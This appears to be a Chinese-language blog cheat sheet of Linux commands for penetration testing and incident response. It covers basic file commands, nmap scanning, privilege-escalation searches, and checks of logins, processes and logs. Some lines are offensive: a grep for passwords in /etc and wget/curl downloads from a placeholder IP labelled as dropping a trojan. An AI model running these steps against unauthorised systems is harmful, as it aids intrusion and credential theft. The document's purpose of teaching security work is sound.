网安 / 渗透 / 应急响应 必备 Linux 命令大全(新手直接背 + 用)
·
我给你整理了从入门到实战全覆盖的命令,分 4 大模块:基础必用、信息收集、渗透提权、应急响应,全是网安工作最常用、最核心的,你直接复制练就行!
一、基础必用(所有场景都离不开)
# 切换目录(进桌面、进文件夹) cd Desktop # 进桌面 cd .. # 返回上一级 pwd # 查看当前在哪个目录 # 查看文件/目录 ls # 列出当前文件 ls -la # 查看隐藏文件+权限(渗透必用) cat 文件名 # 查看文件内容 less 文件名 # 分页看大文件 # 文件操作 touch 1.txt # 创建空文件 mkdir test # 创建文件夹 rm 文件名 # 删除文件 rm -rf 文件夹 # 强制删除文件夹(慎用) # 权限/用户(渗透核心) sudo su # 切换root管理员 chmod 777 文件 # 修改文件权限 whoami # 查看当前用户 id # 查看用户权限
二、信息收集(扫描、查端口、查 IP)
打靶机、渗透测试第一步
# 查本机网络 ifconfig # 查IP(老版) ip a # 查IP(新版) # 端口扫描(Kali自带神器) nmap 192.168.1.100 # 扫描单个IP nmap -A -T4 192.168.1.100 # 全面扫描(系统+服务+版本) nmap --script=vuln 目标IP # 扫描漏洞 # 查网络连接 netstat -antp # 查看开放端口+进程 ss -tulpn # 新版查看端口(更快) ping 目标IP # 测试是否连通
三、渗透测试 / 提权(拿到权限后用)
# 查看系统信息(判断目标系统) uname -a # 内核版本 cat /etc/os-release # 系统版本 # 进程/任务排查 ps aux # 查看所有运行进程 top # 实时看CPU/内存 # 提权常用(找漏洞、找密码) find / -name "*.txt" 2>/dev/null # 全盘找txt文件 grep -r "password" /etc # 搜索密码关键字 sudo -l # 查看当前用户可执行的root命令 # 下载文件(渗透传马) wget http://IP/文件 curl http://IP/文件 -O
四、应急响应(查入侵、查木马、查异常)
工作中最常用!
# 1. 查异常登录 last # 查看登录历史 lastb # 查看失败登录(暴力破解) who # 查看当前在线用户 # 2. 查异常进程(找木马) ps aux --sort=-%cpu # 按CPU排序找异常 kill -9 进程号 # 杀死恶意进程 # 3. 查开机自启(后门常用) systemctl list-unit-files --type=service crontab -l # 查看定时任务 # 4. 查端口外联(黑客回连) netstat -antp | grep ESTABLISHED # 5. 查日志 cat /var/log/auth.log # SSH登录日志 cat /var/log/syslog # 系统日志
五、你现在立刻就能练的 5 条命令
ls -la # 看桌面所有文件(含隐藏) ip a # 看自己IP whoami # 看自己身份 sudo su # 切管理员 nmap localhost# 扫描自己端口
总结
-
基础命令:日常操作、文件查看、目录切换
-
信息收集:
nmapip anetstat -
渗透提权:
findsudo -lps -
应急响应:
lastcrontabnetstatps
更多推荐




所有评论(0)